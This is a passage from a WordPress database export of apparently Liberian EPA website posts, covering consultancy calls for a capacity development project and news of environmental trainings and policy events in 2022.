role=\"presentation\">project.</span></span>\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-Consultancy-to-draft-updated-National-Capacity-Self-Assessment-Final-Report.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant Wanted</a></em>\r\n\r\n&nbsp;','National Consultant Wanted to Draft Updated National Capacity Self-Assessment Final Report for Cross-Cutting Capacity Development Project.','','inherit','closed','closed','','4627-revision-v1','','','2022-04-22 15:22:20','2022-04-22 15:22:20','',4627,'https://ekmsliberia.info/?p=4634',0,'revision','',0),(4635,42,'2022-02-04 15:22:28','2022-02-04 15:22:28','<span id=\"page3R_mcid22\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The objective of the consultancy is to carry out lessons learned study of the selected secondary schools in Montserrado County that are piloting </span><span dir=\"ltr\" role=\"presentation\">the Environmental Awareness curriculum for one semester (September 2021 to April 2022). This lessons learned study will result to a report </span><span dir=\"ltr\" role=\"presentation\">that will highlight the challenges and opportunities to integrating the awareness curriculum into secondary school in Liberia. . The overall task </span><span dir=\"ltr\" role=\"presentation\">of the National consultant will be to ensure that essential steps in the process of drafting and validating the above mentioned document are </span><span dir=\"ltr\" role=\"presentation\">undertaken in a technically sound, timely and transparent fashion. The consultant will work under the overall supervision of CCCD Project in </span><span dir=\"ltr\" role=\"presentation\">close collaboration with the EPA to ensure quality outp</span></span>ut.\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-Prepare-a-Lessons-learned-study-on-the-piloting-of-an-environmental-awareness-module-into-school-curricula.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant Wanted</a></em>','National Consultant to Prepare a Lessons Learned Study on the Piloting of an Environmental Awareness Module into School Curricula','','publish','closed','closed','','national-consultant-to-prepare-a-lessons-learned-study-on-the-piloting-of-an-environmental-awareness-module-into-school-curricula','','','2022-04-22 15:24:53','2022-04-22 15:24:53','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4635',88,'ekms_bulletin','',0),(4636,42,'2022-04-22 15:24:53','2022-04-22 15:24:53','<span id=\"page3R_mcid22\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The objective of the consultancy is to carry out lessons learned study of the selected secondary schools in Montserrado County that are piloting </span><span dir=\"ltr\" role=\"presentation\">the Environmental Awareness curriculum for one semester (September 2021 to April 2022). This lessons learned study will result to a report </span><span dir=\"ltr\" role=\"presentation\">that will highlight the challenges and opportunities to integrating the awareness curriculum into secondary school in Liberia. . The overall task </span><span dir=\"ltr\" role=\"presentation\">of the National consultant will be to ensure that essential steps in the process of drafting and validating the above mentioned document are </span><span dir=\"ltr\" role=\"presentation\">undertaken in a technically sound, timely and transparent fashion. The consultant will work under the overall supervision of CCCD Project in </span><span dir=\"ltr\" role=\"presentation\">close collaboration with the EPA to ensure quality outp</span></span>ut.\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-Prepare-a-Lessons-learned-study-on-the-piloting-of-an-environmental-awareness-module-into-school-curricula.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant Wanted</a></em>','National Consultant to Prepare a Lessons Learned Study on the Piloting of an Environmental Awareness Module into School Curricula','','inherit','closed','closed','','4635-revision-v1','','','2022-04-22 15:24:53','2022-04-22 15:24:53','',4635,'https://ekmsliberia.info/?p=4636',0,'revision','',0),(4637,42,'2022-02-04 15:25:01','2022-02-04 15:25:01','<span id=\"page3R_mcid15\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The objective of the consultancy is to draft and validate guidelines for coordinated monitoring and compliance of global environment. Develop </span><span dir=\"ltr\" role=\"presentation\">quality control/validation procedures. Quality control/validation procedures will be developed to ensure accuracy and validity, and responsible </span><span dir=\"ltr\" role=\"presentation\">scientific and institutional correspondents will be identified to strengthen the objectivity and independence of control and validation procedures. </span><span dir=\"ltr\" role=\"presentation\">Current data collection and generation methods of key agencies will be assessed, paying particular attention to harmonization and metrics, </span><span dir=\"ltr\" role=\"presentation\">relevance, validity, and quality. This will be complemented by an assessment of existing guidelines, tools, and resources.</span></span>\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-draft-and-validate-guidelines-for-coordinated-monitoring-and-compliance-of-global-environment.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant Wanted</a>','National Consultant to Draft and Validate Guidelines for Coordinated Monitoring and Compliance of Global Environment and Develop Quality Control/Validation Procedures','','publish','closed','closed','','national-consultant-to-draft-and-validate-guidelines-for-coordinated-monitoring-and-compliance-of-global-environment-and-develop-quality-control-validation-procedures','','','2022-04-22 15:26:55','2022-04-22 15:26:55','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4637',87,'ekms_bulletin','',0),(4638,42,'2022-04-22 15:26:55','2022-04-22 15:26:55','<span id=\"page3R_mcid15\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The objective of the consultancy is to draft and validate guidelines for coordinated monitoring and compliance of global environment. Develop </span><span dir=\"ltr\" role=\"presentation\">quality control/validation procedures. Quality control/validation procedures will be developed to ensure accuracy and validity, and responsible </span><span dir=\"ltr\" role=\"presentation\">scientific and institutional correspondents will be identified to strengthen the objectivity and independence of control and validation procedures. </span><span dir=\"ltr\" role=\"presentation\">Current data collection and generation methods of key agencies will be assessed, paying particular attention to harmonization and metrics, </span><span dir=\"ltr\" role=\"presentation\">relevance, validity, and quality. This will be complemented by an assessment of existing guidelines, tools, and resources.</span></span>\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-draft-and-validate-guidelines-for-coordinated-monitoring-and-compliance-of-global-environment.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant Wanted</a>','National Consultant to Draft and Validate Guidelines for Coordinated Monitoring and Compliance of Global Environment and Develop Quality Control/Validation Procedures','','inherit','closed','closed','','4637-revision-v1','','','2022-04-22 15:26:55','2022-04-22 15:26:55','',4637,'https://ekmsliberia.info/?p=4638',0,'revision','',0),(4639,42,'2022-02-04 15:27:18','2022-02-04 15:27:18','<span id=\"page3R_mcid14\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The objective of the consultancy is to prepare technical guidance material for planners and other users of indicators relevant to the monitoring </span><span dir=\"ltr\" role=\"presentation\">of the global environment.</span> <span dir=\"ltr\" role=\"presentation\">This will include methodologies to facilitate integrated ecosystem and landscape planning and management that </span><span dir=\"ltr\" role=\"presentation\">reflect adherence to Rio Convention obligations.</span></span>\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expresion-of-Interest-preparation-of-technical-guidance-materials-for-planners-and-other-usersof-indicators-relevant-to-global-environment.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant Wanted</a></em>','National Consultant to Prepare Technical Guidance Material for Planners and Other Users of Indicators Relevant to the Monitoring of the Global Environment.','','publish','closed','closed','','national-consultant-to-prepare-technical-guidance-material-for-planners-and-other-users-of-indicators-relevant-to-the-monitoring-of-the-global-environment','','','2022-04-22 15:29:32','2022-04-22 15:29:32','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4639',86,'ekms_bulletin','',0),(4640,42,'2022-04-22 15:29:32','2022-04-22 15:29:32','<span id=\"page3R_mcid14\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The objective of the consultancy is to prepare technical guidance material for planners and other users of indicators relevant to the monitoring </span><span dir=\"ltr\" role=\"presentation\">of the global environment.</span> <span dir=\"ltr\" role=\"presentation\">This will include methodologies to facilitate integrated ecosystem and landscape planning and management that </span><span dir=\"ltr\" role=\"presentation\">reflect adherence to Rio Convention obligations.</span></span>\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expresion-of-Interest-preparation-of-technical-guidance-materials-for-planners-and-other-usersof-indicators-relevant-to-global-environment.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant Wanted</a></em>','National Consultant to Prepare Technical Guidance Material for Planners and Other Users of Indicators Relevant to the Monitoring of the Global Environment.','','inherit','closed','closed','','4639-revision-v1','','','2022-04-22 15:29:32','2022-04-22 15:29:32','',4639,'https://ekmsliberia.info/?p=4640',0,'revision','',0),(4641,42,'2022-04-22 15:29:39','2022-04-22 15:29:39','<span id=\"page3R_mcid14\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The objective of the consultancy is to prepare technical guidance material for planners and other users of indicators relevant to the monitoring </span><span dir=\"ltr\" role=\"presentation\">of the global environment.</span> <span dir=\"ltr\" role=\"presentation\">This will include methodologies to facilitate integrated ecosystem and landscape planning and management that </span><span dir=\"ltr\" role=\"presentation\">reflect adherence to Rio Convention obligations.</span></span>\n\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expresion-of-Interest-preparation-of-technical-guidance-materials-for-planners-and-other-usersof-indicators-relevant-to-global-environment.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant Wanted</a></em>','National Consultant to Prepare Technical Guidance Material for Planners and Other Users of Indicators Relevant to the Monitoring of the Global Environment.','','inherit','closed','closed','','4639-autosave-v1','','','2022-04-22 15:29:39','2022-04-22 15:29:39','',4639,'https://ekmsliberia.info/?p=4641',0,'revision','',0),(4642,42,'2022-02-04 15:29:41','2022-02-04 15:29:41','<span id=\"page3R_mcid24\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">This component of the project aims to combat the lack of awareness on climate change, biodiversity loss and </span><span dir=\"ltr\" role=\"presentation\">sustainable land management by creating an enabling environment for the general public to gain awareness, effective </span><span dir=\"ltr\" role=\"presentation\">participation and access to data, information and knowledge relating to the Rio Conventions. This intends to build knowledge </span><span dir=\"ltr\" role=\"presentation\">of wider communities against environmental ignorance, support for implementation of environmental policies laws against </span><span dir=\"ltr\" role=\"presentation\">human induced environmental degradation. Realizing the effectiveness of media capacity building and mobilization to </span><span dir=\"ltr\" role=\"presentation\">complement government and CSOs efforts in policy discourse in favors of educating the general public, the CCCD is </span><span dir=\"ltr\" role=\"presentation\">developing the Radio Jingles and PSAs in three different themes for the media campaign on Conventions on Biodiversity, </span><span dir=\"ltr\" role=\"presentation\">Climate Change and Sustainable Land Management.</span></span>\r\n\r\n<em>Link: </em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-to-air-jingles-and-Public-Service-Announcement.pdf\" target=\"_blank\" rel=\"noopener\"><em>National Consultant Wanted</em></a>','Services of a National Broadcasting Institution (Radio & TV) Wanted to Air Jingles and Public Service Announcements (PSAs) on the Rio Conventions Mainstreaming','','publish','closed','closed','','services-of-a-national-broadcasting-institution-radio-tv-wanted-to-air-jingles-and-public-service-announcements-psas-on-the-rio-conventions-mainstreaming','','','2022-04-22 15:35:11','2022-04-22 15:35:11','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4642',85,'ekms_bulletin','',0),(4643,42,'2022-04-22 15:32:51','2022-04-22 15:32:51','<span id=\"page3R_mcid24\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">This component of the project aims to combat the lack of awareness on climate change, biodiversity loss and </span><span dir=\"ltr\" role=\"presentation\">sustainable land management by creating an enabling environment for the general public to gain awareness, effective </span><span dir=\"ltr\" role=\"presentation\">participation and access to data, information and knowledge relating to the Rio Conventions. This intends to build knowledge </span><span dir=\"ltr\" role=\"presentation\">of wider communities against environmental ignorance, support for implementation of environmental policies laws against </span><span dir=\"ltr\" role=\"presentation\">human induced environmental degradation. Realizing the effectiveness of media capacity building and mobilization to </span><span dir=\"ltr\" role=\"presentation\">complement government and CSOs efforts in policy discourse in favors of educating the general public, the CCCD is </span><span dir=\"ltr\" role=\"presentation\">developing the Radio Jingles and PSAs in three different themes for the media campaign on Conventions on Biodiversity, </span><span dir=\"ltr\" role=\"presentation\">Climate Change and Sustainable Land Management.</span></span>\r\n\r\n<em>Link: </em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-to-air-jingles-and-Public-Service-Announcement.pdf\" target=\"_blank\" rel=\"noopener\"><em>National Consultant Wanted</em></a>','Services of a National Broadcasting Institution (Radio & TV) Wanted to Air Jingles and Public Service Announcements (PSAs) on the Rio Conventions Mainstreaming','','inherit','closed','closed','','4642-revision-v1','','','2022-04-22 15:32:51','2022-04-22 15:32:51','',4642,'https://ekmsliberia.info/?p=4643',0,'revision','',0),(4645,42,'2022-04-21 06:30:00','2022-04-21 06:30:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) through its National Ozone Unit in collaboration with the German Agency for International Cooperation (GIZ-Proklima) on Thursday, April 21, 2022, conducted the first of a series of training workshops for Customs and other law enforcement officers on detection of illegal trade.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held in Buchanan, Grand Bassa County, the training focused on the Kigali Amendment and the role of customs officers in identification of Ozone Depleting Substances (ODS) and method used to smuggle them into the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ozone Depleting Substances are gases which damage the ozone layer in the upper atmosphere. They have been largely phased out, but can still be found in older equipment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training also focused on steps to follow when an ODS or ODS based consignments are received on intercepted by customs officers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Facilitators also considered topics like goods inspections and checking of documentation and the requisite authority to contact in case of suspicious consignments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Welcoming participants at the training, Buchanan City Major, Moses D. Hayes lauded the EPA family for choosing Buchanan as the venue for the workshop.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He encouraged participants to take advantage of the training opportunity, which according to him is geared at increasing their knowledge in their various assignments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Hayes further requested the framers of the workshop to frequently hold such workshops so as to keep participants on par with other customs worldwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Manager for Planning and Policy, Christopher Kaba, thanked the participants for leaving their busy schedules to participate in the one-day training exercise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;He admonished the trainees not to only be hearers but practice what they hear, especially so when it has to do with the environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kaba said future generations will appreciate us if everyone strives now to create a safe and sustained environment.</p>\n<!-- /wp:paragraph -->','EPA, GIZ Train Customs, Other Law Enforcement Officers','','publish','closed','closed','','epa-giz-train-customs-other-law-enforcement-officers','','','2022-04-27 10:59:51','2022-04-27 10:59:51','',0,'https://ekmsliberia.info/?p=4645',140,'post','',0),(4646,42,'2022-04-27 10:58:46','2022-04-27 10:58:46','','giz epa','','inherit','open','closed','','giz-epa','','','2022-04-27 10:58:46','2022-04-27 10:58:46','',4645,'https://ekmsliberia.info/wp-content/uploads/2022/04/giz-epa.png',0,'attachment','image/png',0),(4647,42,'2022-04-27 10:59:50','2022-04-27 10:59:50','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) through its National Ozone Unit in collaboration with the German Agency for International Cooperation (GIZ-Proklima) on Thursday, April 21, 2022, conducted the first of a series of training workshops for Customs and other law enforcement officers on detection of illegal trade.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held in Buchanan, Grand Bassa County, the training focused on the Kigali Amendment and the role of customs officers in identification of Ozone Depleting Substances (ODS) and method used to smuggle them into the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ozone Depleting Substances are gases which damage the ozone layer in the upper atmosphere. They have been largely phased out, but can still be found in older equipment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training also focused on steps to follow when an ODS or ODS based consignments are received on intercepted by customs officers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Facilitators also considered topics like goods inspections and checking of documentation and the requisite authority to contact in case of suspicious consignments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Welcoming participants at the training, Buchanan City Major, Moses D. Hayes lauded the EPA family for choosing Buchanan as the venue for the workshop.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He encouraged participants to take advantage of the training opportunity, which according to him is geared at increasing their knowledge in their various assignments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Hayes further requested the framers of the workshop to frequently hold such workshops so as to keep participants on par with other customs worldwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Manager for Planning and Policy, Christopher Kaba, thanked the participants for leaving their busy schedules to participate in the one-day training exercise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;He admonished the trainees not to only be hearers but practice what they hear, especially so when it has to do with the environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kaba said future generations will appreciate us if everyone strives now to create a safe and sustained environment.</p>\n<!-- /wp:paragraph -->','EPA, GIZ Train Customs, Other Law Enforcement Officers','','inherit','closed','closed','','4645-revision-v1','','','2022-04-27 10:59:50','2022-04-27 10:59:50','',4645,'https://ekmsliberia.info/?p=4647',0,'revision','',0),(4648,42,'2022-02-22 11:03:00','2022-02-22 11:03:00','<!-- wp:paragraph -->\n<p>The Environment Protection Agency - EPA of #Liberia on Monday, 21 February 2022 Commenced a two-week Environmental Social Impacts Assessment (ESIA) Licensure Training for independent evaluators, project developers, proponents and line ministries, agencies and commission of the Liberian Government. The 8th ESIA Licensure Training is intended to renew the licenses of all current third-party independent evaluators and as well certify new evaluators.</p>\n<!-- /wp:paragraph -->','EPA Holds a Two-Week ESIA Licensure Training for Independent Evaluators, Project Developers, etc..','','publish','closed','closed','','epa-holds-a-two-week-esia-licensure-training-for-independent-evaluators-project-developers-etc','','','2022-04-27 11:11:05','2022-04-27 11:11:05','',0,'https://ekmsliberia.info/?p=4648',139,'post','',0),(4649,42,'2022-04-27 11:10:31','2022-04-27 11:10:31','','esia training','','inherit','open','closed','','esia-training','','','2022-04-27 11:10:31','2022-04-27 11:10:31','',4648,'https://ekmsliberia.info/wp-content/uploads/2022/04/esia-training.png',0,'attachment','image/png',0),(4650,42,'2022-04-27 11:11:03','2022-04-27 11:11:03','<!-- wp:paragraph -->\n<p>The Environment Protection Agency - EPA of #Liberia on Monday, 21 February 2022 Commenced a two-week Environmental Social Impacts Assessment (ESIA) Licensure Training for independent evaluators, project developers, proponents and line ministries, agencies and commission of the Liberian Government. The 8th ESIA Licensure Training is intended to renew the licenses of all current third-party independent evaluators and as well certify new evaluators.</p>\n<!-- /wp:paragraph -->','EPA Holds a Two-Week ESIA Licensure Training for Independent Evaluators, Project Developers, etc..','','inherit','closed','closed','','4648-revision-v1','','','2022-04-27 11:11:03','2022-04-27 11:11:03','',4648,'https://ekmsliberia.info/?p=4650',0,'revision','',0),(4651,42,'2022-02-28 11:13:00','2022-02-28 11:13:00','<!-- wp:paragraph -->\n<p>In strengthening the current ESIA regime through the ESY-MAP, a process of assessing the quality of Environmental Assessment (EA) regime in a country, EPA moves to phase two of the ESIA Licensure Training. This time, the training is being facilitated by the Netherlands Commission for Environmental Assessment (NCEA), who has co-developed the ESY-MAP tool with the World Bank and the Southern=African Institute for Environmental Assessment (SAIEA). The training is from February 28th to the 2nd of March. </p>\n<!-- /wp:paragraph -->','EPA Moves to Phase Two of the ESIA Licensure Training','','publish','open','open','','epa-moves-to-phase-two-of-the-esia-licensure-training','','','2022-04-27 11:16:01','2022-04-27 11:16:01','',0,'https://ekmsliberia.info/?p=4651',138,'post','',0),(4652,42,'2022-04-27 11:15:52','2022-04-27 11:15:52','','ESIA training 2','','inherit','open','closed','','esia-training-2','','','2022-04-27 11:15:52','2022-04-27 11:15:52','',4651,'https://ekmsliberia.info/wp-content/uploads/2022/04/ESIA-training-2.png',0,'attachment','image/png',0),(4653,42,'2022-04-27 11:15:59','2022-04-27 11:15:59','<!-- wp:paragraph -->\n<p>In strengthening the current ESIA regime through the ESY-MAP, a process of assessing the quality of Environmental Assessment (EA) regime in a country, EPA moves to phase two of the ESIA Licensure Training. This time, the training is being facilitated by the Netherlands Commission for Environmental Assessment (NCEA), who has co-developed the ESY-MAP tool with the World Bank and the Southern=African Institute for Environmental Assessment (SAIEA). The training is from February 28th to the 2nd of March. </p>\n<!-- /wp:paragraph -->','EPA Moves to Phase Two of the ESIA Licensure Training','','inherit','closed','closed','','4651-revision-v1','','','2022-04-27 11:15:59','2022-04-27 11:15:59','',4651,'https://ekmsliberia.info/?p=4653',0,'revision','',0),(4654,42,'2022-03-04 11:19:00','2022-03-04 11:19:00','<!-- wp:paragraph -->\n<p>Liberia through the Environmental Protection Agency (EPA) has endorsed a historic resolution seeking to forge a legally binding agreement to combat plastic pollution worldwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The decision was made at the United Nations Environment Assembly (UNEA-5) in Nairobi, Kenya on Wednesday under the theme ‘<em>Strengthening Actions for Nature to Achieve the Sustainable Development Goals</em>’ where Liberia is represented by a high-level delegation headed by Prof. Wilson K. Tarpeh, Executive Director of the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Source: <strong><em>Front-Page Africa</em></strong> </p>\n<!-- /wp:paragraph -->','Liberia Endorses Resolution To Combat Plastic Pollution at the UNEA in Nairobi, Kenya','','publish','closed','closed','','liberia-endorses-resolution-to-combat-plastic-pollution-at-the-unea-in-nairobi-kenya','','','2022-04-27 11:26:17','2022-04-27 11:26:17','',0,'https://ekmsliberia.info/?p=4654',137,'post','',0),(4655,42,'2022-04-27 11:25:27','2022-04-27 11:25:27','','ED','','inherit','open','closed','','ed','','','2022-04-27 11:25:27','2022-04-27 11:25:27','',4654,'https://ekmsliberia.info/wp-content/uploads/2022/04/ED.png',0,'attachment','image/png',0),(4656,42,'2022-04-27 11:26:15','2022-04-27 11:26:15','<!-- wp:paragraph -->\n<p>Liberia through the Environmental Protection Agency (EPA) has endorsed a historic resolution seeking to forge a legally binding agreement to combat plastic pollution worldwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The decision was made at the United Nations Environment Assembly (UNEA-5) in Nairobi, Kenya on Wednesday under the theme ‘<em>Strengthening Actions for Nature to Achieve the Sustainable Development Goals</em>’ where Liberia is represented by a high-level delegation headed by Prof. Wilson K. Tarpeh, Executive Director of the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Source: <strong><em>Front-Page Africa</em></strong> </p>\n<!-- /wp:paragraph -->','Liberia Endorses Resolution To Combat Plastic Pollution at the UNEA in Nairobi, Kenya','','inherit','closed','closed','','4654-revision-v1','','','2022-04-27 11:26:15','2022-04-27 11:26:15','',4654,'https://ekmsliberia.info/?p=4656',0,'revision','',0),(4657,42,'2022-03-19 11:26:00','2022-03-19 11:26:00','<!-- wp:paragraph -->\n<p>The National Disaster Management Agency (NDMA) of Liberia through the division of risks and early warning in collaboration with the Environmental Protection Agency/ Energy and Environment with support from the United Nation Development Program (UNDP) on Wednesday March 16, 2022 commenced a three-day capacity enhancement training in Gbarnga Bong County.The training brought together participants from the county level and representatives of various Line Ministries and Agencies.</p>\n<!-- /wp:paragraph -->','The National Disaster Management Agency in Collaboration with the EPA Commenced a Three-Day Capacity Enhancement Training in Gbarnga, Bong County','','publish','closed','closed','','the-national-disaster-management-agency-in-collaboration-with-the-epa-commenced-a-three-day-capacity-enhancement-training-in-gbarnga-bong-county','','','2022-04-27 11:33:57','2022-04-27 11:33:57','',0,'https://ekmsliberia.info/?p=4657',136,'post','',0),(4658,42,'2022-04-27 11:33:36','2022-04-27 11:33:36','','ndma training','','inherit','open','closed','','ndma-training','','','2022-04-27 11:33:36','2022-04-27 11:33:36','',4657,'https://ekmsliberia.info/wp-content/uploads/2022/04/ndma-training.png',0,'attachment','image/png',0),(4659,42,'2022-04-27 11:33:55','2022-04-27 11:33:55','<!-- wp:paragraph -->\n<p>The National Disaster Management Agency (NDMA) of Liberia through the division of risks and early warning in collaboration with the Environmental Protection Agency/ Energy and Environment with support from the United Nation Development Program (UNDP) on Wednesday March 16, 2022 commenced a three-day capacity enhancement training in Gbarnga Bong County.The training brought together participants from the county level and representatives of various Line Ministries and Agencies.</p>\n<!-- /wp:paragraph -->','The National Disaster Management Agency in Collaboration with the EPA Commenced a Three-Day Capacity Enhancement Training in Gbarnga, Bong County','','inherit','closed','closed','','4657-revision-v1','','','2022-04-27 11:33:55','2022-04-27 11:33:55','',4657,'https://ekmsliberia.info/?p=4659',0,'revision','',0),(4660,42,'2022-03-17 11:34:00','2022-03-17 11:34:00','<!-- wp:paragraph -->\n<p>After a two-year delay occasioned by Covid19, the Government of Liberia today held an action dialogue in a bid to improve development aid coordination and impact.The dialogue included several ministers, development partners, the private sector and civil society .The dialogue is expected to demonstrate how development initiatives in the country are reducing poverty, unemployment and paving way for the prosperity of the country and its people.</p>\n<!-- /wp:paragraph -->','The Government of Liberia Today Held an Action Dialogue in a Bid to Improve Development Aid Coordination and Impact','','publish','open','open','','the-government-of-liberia-today-held-an-action-dialogue-in-a-bid-to-improve-development-aid-coordination-and-impact','','','2022-05-09 11:16:58','2022-05-09 11:16:58','',0,'https://ekmsliberia.info/?p=4660',135,'post','',0),(4661,42,'2022-04-27 11:42:56','2022-04-27 11:42:56','','gol','','inherit','open','closed','','gol','','','2022-04-27 11:42:56','2022-04-27 11:42:56','',4660,'https://ekmsliberia.info/wp-content/uploads/2022/04/gol.png',0,'attachment','image/png',0),(4662,42,'2022-04-27 11:44:35','2022-04-27 11:44:35','<!-- wp:paragraph -->\n<p>After a two-year delay occasioned by Covid19, the Government of Liberia today held an action dialogue in a bid to improve development aid coordination and impact.The dialogue included several ministers, development partners, the private sector and civil society .The dialogue is expected to demonstrate how development initiatives in the country are reducing poverty, unemployment and paving way for the prosperity of the country and its people.</p>\n<!-- /wp:paragraph -->','the Government of Liberia Today Held an Action Dialogue in a Bid to Improve Development Aid Coordination and Impact','','inherit','closed','closed','','4660-revision-v1','','','2022-04-27 11:44:35','2022-04-27 11:44:35','',4660,'https://ekmsliberia.info/?p=4662',0,'revision','',0),(4663,42,'2022-03-17 12:10:00','2022-03-17 12:10:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency OF Liberia (EPA) with support from GIZ on Thursday, March 17, 2022 commence a three-day training of environmental technicians and inspectors on Environmental Monitoring and Control within the mining sector.EPA Executive Director, Prof. Wilson K. Tarpeh in special remark, welcomed and appreciated the support from GIZ and acknowledged that the training is in alignment with the EPA five years’ strategic plan which commenced in 2022.The training is expected to cover both theoretical and practical segments at a Class A and Class B gold mine.It\'s also anticipated that the acknowledge acquired will be extended to tackling challenges faced within the artisanal small scale mining sector. </p>\n<!-- /wp:paragraph -->','The EPA with Support from GIZ commence a Three-Day Training of Environmental Technicians and Inspectors on Environmental Monitoring and Control within the Mining sector.','','publish','closed','closed','','the-epa-with-support-from-giz-commence-a-three-day-training-of-environmental-technicians-and-inspectors-on-environmental-monitoring-and-control-within-the-mining-sector','','','2022-04-27 12:16:16','2022-04-27 12:16:16','',0,'https://ekmsliberia.info/?p=4663',134,'post','',0),(4664,42,'2022-04-27 12:15:32','2022-04-27 12:15:32','','epa, giz','','inherit','open','closed','','epa-giz','','','2022-04-27 12:15:32','2022-04-27 12:15:32','',4663,'https://ekmsliberia.info/wp-content/uploads/2022/04/epa-giz.png',0,'attachment','image/png',0),(4665,42,'2022-04-27 12:16:14','2022-04-27 12:16:14','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency OF Liberia (EPA) with support from GIZ on Thursday, March 17, 2022 commence a three-day training of environmental technicians and inspectors on Environmental Monitoring and Control within the mining sector.EPA Executive Director, Prof. Wilson K. Tarpeh in special remark, welcomed and appreciated the support from GIZ and acknowledged that the training is in alignment with the EPA five years’ strategic plan which commenced in 2022.The training is expected to cover both theoretical and practical segments at a Class A and Class B gold mine.It\'s also anticipated that the acknowledge acquired will be extended to tackling challenges faced within the artisanal small scale mining sector. </p>\n<!-- /wp:paragraph -->','The EPA with Support from GIZ commence a Three-Day Training of Environmental Technicians and Inspectors on Environmental Monitoring and Control within the Mining sector.','','inherit','closed','closed','','4663-revision-v1','','','2022-04-27 12:16:14','2022-04-27 12:16:14','',4663,'https://ekmsliberia.info/?p=4665',0,'revision','',0),(4668,42,'2022-05-09 11:11:22','2022-05-09 11:11:22','<!-- wp:paragraph -->\n<p><strong>Monrovia – </strong>The newly constituted Board of Directors of Liberia’s Environmental Protection Agency (EPA) has pledged its unflinching support to the Executive Director Prof. Wilson K. Tarpeh, as they strive to achieve the goals and strategy policy of the Agency.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Board led by Chairman Rupert Marshall made the commitment during its first meeting since it was set up by President George M. Weah last month.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We join you within the terms of our reference to do what has to be done to enhance your work and let it have an impact within and beyond our borders,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said shortly after his appointment, he had opportunities to speak at several schools and urged the students to set up environmental clubs; adding that some schools already had such clubs, and those that do not have agreed.</p>\n<!-- /wp:paragraph 